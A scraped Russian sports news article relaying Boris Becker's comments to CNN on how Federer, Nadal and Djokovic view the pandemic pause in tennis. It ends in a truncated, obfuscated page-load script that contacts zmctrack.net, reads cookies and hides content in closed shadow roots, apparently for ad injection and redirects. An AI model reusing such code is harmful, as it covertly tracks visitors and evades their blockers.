«Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить»: откровения легенды тенниса

А вот Джокович, который был на ходу, безусловно, расстроен паузой

Бывшая первая ракетка мира и олимпийский чемпион в парном разряде немец Борис Беккер поделился своим мнением по поводу того, как игроки «Большой тройки» – швейцарец Роджер Федерер, испанец Рафаэль Надаль и серб Новак Джокович – относятся к паузе в сезоне из-за пандемии коронавируса. Ранее мы писали, что легендарный теннисист стал дипломатом, чтобы избежать банкротства.

«Возможно, Роджер Федерер отчасти даже рад происходящему, потому что сейчас ни один из его рекордов не может быть побит. Новак, наверняка, расстроен больше всех из этой троицы. Ведь в 2020 году Джокович не проиграл ни одного матча, сначала приведя сборную Сербии к победе на ATP Cup, а затем став чемпионом на Australian Open и турнира в Дубае. Он никогда не скажет этого публично, но, думаю, в глубине души он разочарован тем, что не может играть", – рассказал теннисист и тренер CNN.

Читайте также: Надо будет обсудить с Федерером: украинская прима рассказала о паре со Свитолиной и миксте с легендой

	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды тенниса

Реклама

Роджер Федерер и Рафаэль Надаль / Фото: Reuters

"Ждал, что Рафаэль Надаль в этом году вновь выиграет Ролан Гаррос — уже в 13-й раз — и сравняется с Роджером по победам на турнирах Большого шлема. У обоих будет по 20 титулов. Что касается новых титулов Федерера на мэйджорах, то, считаю, его единственный шанс сейчас — выиграть Уимблдон», — сказал Беккер в интервью CNN.

Ранее Федерер заявил, что коронавирус провоцирует революцию в мире тенниса.

Смотрите сюжет о взлетах и падениях Новака Джоковича

Реклама

Все подробности в спецтеме Коронавирус

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

теннисист
перерыв
Новак Джокович
Рафаэль Надаль
Роджер Федерер
Борис Беккер
коронавирус

Источник:

CNN

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды тенниса«На улице военные. Боюсь выходить»: теннисистка, уменьшившая грудь, излила душу по поводу пандемииТеннис 	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды теннисаПервые после коронавируса: названы спортсмены, которые вернут к жизни мировой теннисТеннис 	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды теннисаБеременная Баюл, сексуальная Свитолина и «корабль» Ломаченко : откровения звезд спорта – на карантинеДругие 	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды теннисаУсик решил вытереть ноги об Усика, а Свитолина устроила «стриптиз»: звезды спорта зажигают на карантинеДругие 	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды теннисаУсик пыхтит с гирей, а Ризатдинова ушла в легкую «котлетику»: что творят звезды спорта на карантинеДругие 	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды теннисаКоронавирус или спорт: кто побеждает? Онлайн-трансляцияДругие

Новости партнеров

Загрузка…

загрузка…

	"Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить": откровения легенды тенниса

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “«Федерер отчасти рад этой ситуации — его рекорды сейчас нельзя побить»: откровения легенды тенниса”